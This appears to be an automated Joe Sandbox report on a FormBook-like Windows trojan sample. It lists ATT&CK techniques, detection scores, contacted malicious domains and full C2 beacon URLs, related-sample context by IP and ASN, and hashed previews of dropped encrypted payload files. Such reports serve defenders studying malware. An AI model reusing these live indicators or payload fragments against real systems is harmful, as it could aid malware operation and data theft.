Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	161 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AuKUol8SPU.exe	66%	Virustotal		Browse
AuKUol8SPU.exe	71%	ReversingLabs	Win32.Trojan.Strab
AuKUol8SPU.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.ausyva4.top/al74/	0%	Avira URL Cloud	safe
http://www.969-usedcar02.shop/cfcv/?rVu4SxF=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/HVtkfFoENqJsrfHfmbA9hKHiQ73oaQ==&JXYh=X6eL8Vp0	0%	Avira URL Cloud	safe
http://www.opro.vip	0%	Avira URL Cloud	safe
http://pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSp	0%	Avira URL Cloud	safe
http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E	0%	Avira URL Cloud	safe
http://www.opro.vip/3oq9/?rVu4SxF=2MJNacGdKZTNHNzV3BrHuFLNQ1jOTMwdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHmiv8xn0odowBTH4/kOUn28Kur/JALIg==&JXYh=X6eL8Vp0	0%	Avira URL Cloud	safe
http://www.juewucangku.xyz/b6bc/	0%	Avira URL Cloud	safe
http://www.pku-cs-cjw.top/k3hn/	0%	Avira URL Cloud	safe
http://www.969-usedcar02.shop/cfcv/	0%	Avira URL Cloud	safe
http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDupCQsZrXlGifKOpb9tUiueuaR7GHXUw==	0%	Avira URL Cloud	safe
http://www.goldbracelet.top/3e00/?rVu4SxF=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCK31lP9N0MfL58cB+/rM1htgjxM9asHw==&JXYh=X6eL8Vp0	0%	Avira URL Cloud	safe
http://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUAi+2qRV04Y8KYMj5mgKl2iJfvRHsG+g==	0%	Avira URL Cloud	safe
http://www.startsomething.xyz/9er8/	0%	Avira URL Cloud	safe
http://www.pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs8j2YhgReETzRCnNPRybqTpZLdK0zipA==&JXYh=X6eL8Vp0	0%	Avira URL Cloud	safe
http://www.opro.vip/3oq9/	0%	Avira URL Cloud	safe
http://www.startsomething.xyz/9er8/?rVu4SxF=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaMHx03gUwA2Avn+NiKPlzkrwvOlggCg==&JXYh=X6eL8Vp0	0%	Avira URL Cloud	safe
https://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkE	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.969-usedcar02.shop	199.59.243.228	true	true	unknown
www.goldbracelet.top	104.21.36.239	true	false	high
www.ausyva4.top	104.21.48.233	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
overdue.aliyun.com	170.33.13.246	true	false	high
187370.github.io	185.199.108.153	true	true	unknown
www.juewucangku.xyz	8.136.96.106	true	true	unknown
santillo.bet	66.235.200.145	true	true	unknown
www.startsomething.xyz	69.57.163.64	true	true	unknown
www.santillo.bet	unknown	unknown	false	unknown
www.pku-cs-cjw.top	unknown	unknown	false	unknown
www.opro.vip	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.969-usedcar02.shop/cfcv/?rVu4SxF=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/HVtkfFoENqJsrfHfmbA9hKHiQ73oaQ==&JXYh=X6eL8Vp0	true	Avira URL Cloud: safe	unknown
http://www.ausyva4.top/al74/	true	Avira URL Cloud: safe	unknown
http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDupCQsZrXlGifKOpb9tUiueuaR7GHXUw==	true	Avira URL Cloud: safe	unknown
http://www.opro.vip/3oq9/?rVu4SxF=2MJNacGdKZTNHNzV3BrHuFLNQ1jOTMwdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHmiv8xn0odowBTH4/kOUn28Kur/JALIg==&JXYh=X6eL8Vp0	true	Avira URL Cloud: safe	unknown
http://www.969-usedcar02.shop/cfcv/	true	Avira URL Cloud: safe	unknown
http://www.pku-cs-cjw.top/k3hn/	true	Avira URL Cloud: safe	unknown
http://www.juewucangku.xyz/b6bc/	true	Avira URL Cloud: safe	unknown
http://www.goldbracelet.top/3e00/?rVu4SxF=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCK31lP9N0MfL58cB+/rM1htgjxM9asHw==&JXYh=X6eL8Vp0	false	Avira URL Cloud: safe	unknown
http://www.pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs8j2YhgReETzRCnNPRybqTpZLdK0zipA==&JXYh=X6eL8Vp0	true	Avira URL Cloud: safe	unknown
http://www.startsomething.xyz/9er8/	true	Avira URL Cloud: safe	unknown
http://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUAi+2qRV04Y8KYMj5mgKl2iJfvRHsG+g==	true	Avira URL Cloud: safe	unknown
http://www.opro.vip/3oq9/	true	Avira URL Cloud: safe	unknown
http://www.startsomething.xyz/9er8/?rVu4SxF=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaMHx03gUwA2Avn+NiKPlzkrwvOlggCg==&JXYh=X6eL8Vp0	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ausyva4.top/al74/?JXYh=X6eL8Vp0&rVu4SxF=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E	wiaacmgr.exe, 00000005.00000002.2597992420.0000000006038000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.00000000033C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pku-cs-cjw.top/k3hn/?rVu4SxF=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSp	wiaacmgr.exe, 00000005.00000002.2597992420.0000000005EA6000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.0000000003236000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.opro.vip	kObgmFzfBE.exe, 00000008.00000002.2598461928.000000000516C000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	wiaacmgr.exe, 00000005.00000002.2599672177.0000000008110000.00000004.00000800.00020000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2597992420.00000000061CA000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.000000000355A000.00000004.00000001.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.juewucangku.xyz/b6bc/?JXYh=X6eL8Vp0&rVu4SxF=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkE	wiaacmgr.exe, 00000005.00000002.2597992420.000000000635C000.00000004.10000000.00040000.00000000.sdmp, kObgmFzfBE.exe, 00000008.00000002.2597086045.00000000036EC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	wiaacmgr.exe, 00000005.00000003.1771395623.00000000083BE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.136.96.106	www.juewucangku.xyz	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
69.57.163.64	www.startsomething.xyz	United States	25653	FORTRESSITXUS	true
170.33.13.246	overdue.aliyun.com	Singapore	134963	ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited	false
104.21.36.239	www.goldbracelet.top	United States	13335	CLOUDFLARENETUS	false
104.21.48.233	www.ausyva4.top	United States	13335	CLOUDFLARENETUS	true
185.199.108.153	187370.github.io	Netherlands	54113	FASTLYUS	true
199.59.243.228	www.969-usedcar02.shop	United States	395082	BODIS-NJUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588002
Start date and time:	2025-01-10 20:23:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AuKUol8SPU.exe renamed because original name is a hash value
Original Sample Name:	39ce493be8b616b0a5e0a7d96e1790789217833cac76f8d31cf73e6347d80916.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@8/7
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 63 Number of non-executed functions: 270
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target kObgmFzfBE.exe, PID 7164 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
14:25:46	API Interceptor	2635951x Sleep call for process: wiaacmgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
8.136.96.106	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.juewucangku.xyz/b6bc/
	DHL.exe	Get hash	malicious	FormBook	Browse	www.juewucangku.xyz/b6bc/
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.juewucangku.xyz/mia8/
69.57.163.64	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.showyourstyle.top/zbqa/
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.startsomething.xyz/9er8/
	DHL.exe	Get hash	malicious	FormBook	Browse	www.startsomething.xyz/9er8/
	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	www.openhorizons.pro/ir2n/
170.33.13.246	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	www.opro.vip/3oq9/
	file.exe	Get hash	malicious	Unknown	Browse	dxcj.com/phpmyadmin/
	Payment_Advice.exe	Get hash	malicious	FormBook	Browse	www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx
	SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe	Get hash	malicious	Unknown	Browse	www.wpsss.com/myphp/qq.php?k=01635e79b15b98a2eec057d73b54687f
	SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe	Get hash	malicious	Unknown	Browse	www.wpsss.com/myphp/qq.php?k=4fd39f28f7ba8fa8c2b0e633ac949a3a
	YSpCB8DEek.exe	Get hash	malicious	FormBook	Browse	www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	1358019715229232264.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	https://probashkontho.com/work/Organization/privacy/index_.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	ZV2G9QQzlR.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	xrAlbTvRsz.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Xf3rn1smZw.exe	Get hash	malicious	RedLine	Browse	13.107.246.45
	ThBJg59JRC.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	293816234142143228.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	Voicemail_+Transcription+_ATT006151.docx	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	13.107.246.45
www.969-usedcar02.shop	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
www.969-usedcar02.shop	DHL.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
overdue.aliyun.com	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	170.33.13.246
	DHL.exe	Get hash	malicious	FormBook	Browse	170.33.13.246
	Document.exe	Get hash	malicious	FormBook	Browse	170.33.13.246
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	170.33.13.246
	file.exe	Get hash	malicious	Unknown	Browse	170.33.13.246
	BRvptajioG.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc	Browse	170.33.13.246
	Payment_Advice.exe	Get hash	malicious	FormBook	Browse	170.33.13.246
	SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe	Get hash	malicious	Unknown	Browse	170.33.13.246
	SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exe	Get hash	malicious	Unknown	Browse	170.33.13.246
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	170.33.13.246
www.goldbracelet.top	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.36.239
	DHL.exe	Get hash	malicious	FormBook	Browse	104.21.36.239
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	172.67.201.49
	1k24tbb-00241346.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.201.49
	file.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	104.21.36.239
www.ausyva4.top	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
www.ausyva4.top	DHL.exe	Get hash	malicious	FormBook	Browse	104.21.48.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	frosty.x86.elf	Get hash	malicious	Mirai	Browse	47.110.90.76
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x64.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.103
	armv5l.elf	Get hash	malicious	Unknown	Browse	47.116.93.193
	3.elf	Get hash	malicious	Unknown	Browse	47.113.16.150
	armv7l.elf	Get hash	malicious	Unknown	Browse	8.181.124.11
	THsSNYblMw.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.121.190.121
FORTRESSITXUS	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	69.57.162.6
	miori.spc.elf	Get hash	malicious	Unknown	Browse	69.72.254.176
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	208.116.70.219
	DHL.exe	Get hash	malicious	FormBook	Browse	69.57.163.64
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	65.98.32.221
	Salmebogs(1).exe	Get hash	malicious	FormBook, GuLoader	Browse	69.57.163.64
	http://dimfa.elcompanies.digitalillustra.com	Get hash	malicious	Unknown	Browse	65.181.111.144
	RN# D7521-RN-00353 REV-2.exe	Get hash	malicious	FormBook	Browse	69.57.163.227
ASEPL-AS-APAlibabacomSingaporeE-CommercePrivateLimited	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	170.33.13.246
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	170.33.160.26
	la.bot.powerpc.elf	Get hash	malicious	Mirai	Browse	170.33.103.113
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	170.33.0.243
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	170.33.134.252
	94.156.67.132-skid.mpsl-2024-07-30T18_34_38.elf	Get hash	malicious	Mirai, Moobot	Browse	170.33.173.122
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	170.33.13.246
	http://www.fotoschuppen.net/	Get hash	malicious	Unknown	Browse	170.33.9.227
	https://www.bzqmgs.com/	Get hash	malicious	Unknown	Browse	170.33.9.227
	https://www.exactcollisionllc.com/	Get hash	malicious	Unknown	Browse	170.33.9.227

Process:	C:\Users\user\Desktop\AuKUol8SPU.exe
File Type:	data
Category:	dropped
Size (bytes):	10936
Entropy (8bit):	7.485391701939966
Encrypted:	false
SSDEEP:	192:F1Eu3FqgSIooobUwCjuUiYqrYSYpJTV2WhGgVvype2qUNaP0zFYbjnsSfeDx/GSq:F2qwHUH1hpJZjMghypMtvMPDx/GhytsX
MD5:	3B38BE296426FF88E0B742850AAD768D
SHA1:	970786F7E03DA0398250369F9F876E5A9BCC0E91
SHA-256:	0211153BEF45CB049C49FCCB63609795DF62D9FD4301657A3CB9809BEE581805
SHA-512:	F921C5C6CDE6B7DF00CC9492E98A371D0E1A1E60FD57FE843181A40677D7F99EEF62403F30877EB00D6DA3490BF4434B0B8FE74BAF7337A67F25154867978DE0
Malicious:	false
Reputation:	low
Preview:	EA06..t..MlV9...2.L&.y.`..Nf.I...&.M.3 .,N'.P..X@..c.....e.L..q0.....2....i8....m9.-.p.m.......@..d.Y..k..n.....N.....X@.........l.@....Y&...... ...`fs..$......`.u............p.......`....L.`...Zi9..v..W....l.{..M.^.....@.....'30...G{e.....w.....X@i.8..{h..3K....S..mL.=..!...v.Z....]..`..S.....\|..9..rjd....N...:.4....`.5.o5.Y,.i..kc...@.`....Y....h.-...(.X...+,.od...VI...c..'.)....y..z.d..l......Y....e.Y... .g,.)....`.......Z.,..o6..!h...k ..5...\|@O..[@...L.!>y..h.Y..g3...G.0.Y,.I..'.d.L,@..(.i5.X.lvK$....Xf......t.....lsy...d..B\|S........&. ..i5...s..Y...ae...g3.4..s.L.s..O.k1.M.,>[$.gd.X.ls.....@...Ll...,.a2...\|.....S........ .ba6..)l.....S....[`..........@...ob...j......mc.B.l........q&.._..36.L' JZ..!n.b...l......F.....c8........8..H.P>.ab........X.9..yb...S...q2.L,.....b..=beb.v.......3I..h...Y,s9...(.P&`.....b.....!@.L.L3....0..&.a3.L.'~9...f ...L.r.,..e...;....w .[.5@&.....} ..c8..Mnp.5......_$..k..........k ....,VI..j.NY..)..e4....;........i.......V...`.&

C:\Users\user\AppData\Local\Temp\autA561.tmp

Download File

Process:	C:\Users\user\Desktop\AuKUol8SPU.exe
File Type:	data
Category:	dropped
Size (bytes):	289280
Entropy (8bit):	7.995244987913894
Encrypted:	true
SSDEEP:	6144:/5VjRHm4/Vre1uwOgjL3oyH+XQCXP5x2SHgvMGLXQ8d9dAfxhP:/FG4tS1f9jLX+ACXPiSHgEOXQxX
MD5:	F6330A7821844ECDD6F6B136BB24F20F
SHA1:	D8FD3326BB62CDC13F47E1A582470613A810802F
SHA-256:	A90C9F32F24D631FB2B51299695686BEFBB93BC5525D4C0469B60F83BE51D3B1
SHA-512:	8D344CDA05BB232FB01B1B96D9A3122FD800F68CA9E64D33DD3702C359C1B8EAED90A37A18F1508349421651FC003898AA6DBB0CD4FB138E02D21434AFA1CDDA
Malicious:	false
Reputation:	low
Preview:	.b.IB388]RED..UH.0GPZFHD.0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFC.8MIO,.6Y.L.j.T....835h4(_ 1'.v[,'/\L.;7e6>(u!9....f%+>UiNKIr8MIA388 SL.v&2.jP .g&/.@..\|#1.W....X>._..i(0..99.u$=.GCFCV8MI.v88.SDD!I\|.W0GPZFHD.0EBMB]8M.E388YREDKF.\W0G@ZFH4^0GC.CV(MIA188_REDKFUHQ0GPZFHDZ@CCFAV8MIA3:8..ED[FUXW0GPJFHTZ0GCFCF8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDe200#0GP..LDZ GCF.R8MYA388YREDKFUHW0gPZ&HDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YREDKFUHW0GPZFHDZ0GCFCV8MIA388YR

C:\Users\user\AppData\Local\Temp\biopsies

Download File

Process:	C:\Users\user\Desktop\AuKUol8SPU.exe
File Type:	ASCII text, with very long lines (29698), with no line terminators
Category:	dropped
Size (bytes):	29698
Entropy (8bit):	3.539469784256716
Encrypted:	false
SSDEEP:	384:ME5VoBDer5vojb16ePAcvvo7OreFCutBBl0s0sk/dcsuu+ni4iHiTonvXqdSnMy9:MuVUD+vojbe7rM6ucBi4iHiTovXlpFma
MD5:	B172B3A80D076AE1A6A2E53CC7038087
SHA1:	4FABB4D78083B3C5AD6C2AA2BE9756D3B3B97789
SHA-256:	0C5DEC6CA809E401282DFE3BF0DE75DD434069216AE09AE52F03AE07B2C1ADD8
SHA-512:	80A00BB1260DF1DA06058FE4EEFF8A4B983CD8A5A0250EB9B4A71E48BF289EBD4E7CA3D7B20A07AA6A88E20159ED678E5950453409F7F75BCC1BB76D2CC92E85
Malicious:	false
Reputation:	low
Preview:	x5bc1cc200678b00069549500069d6a200069588e000695a9500069dcac000695e8300069509200069d2ae00069548400069569c00069d8ac000695a30695c9e00069d4fffa40006956fff840006958fff9c00069dafffac000695cfff8e000695efff9400069d0fffac0006952fff8c0006954fff3969d6fffa500069508300069529500069d4a200069568300069589200069daae000695c84000695e9c00069d0ac00069523069549100069d8fffa4000695afff86000695cfff9100069defffa00006950fff890006952fff9300069d4fffa20006956fff8e0006958fff9400069dafffac000695cfff8c000695efff3969d0a300069508800069529c00069d4a700069568100069589000069daa9000695c8e000695e9400069d0ac00069528c00069543969d6a3000695888000695a9500069dcac000695e8c00069509300069d2a200069548e00069569400069d8ac000695a8c000695c3969de754dff7c5cd54dff958dff75cdff19e4d54dff950eff754eff2e77dd4dff9d8eff75ceff8b86d58dff950eff754effade9d5cdff958eff75ceff2dbeddcdff9d0eff754effd260d54dff958eff75ceff9860d5cdff950eff754eff5764ddcdff9d8eff75ceff6d69d50dff950eff754eff892bd50dff958eff75ceff8d2eddcdff9d0eff754effd944d50dff958eff75ceffe98bd54df

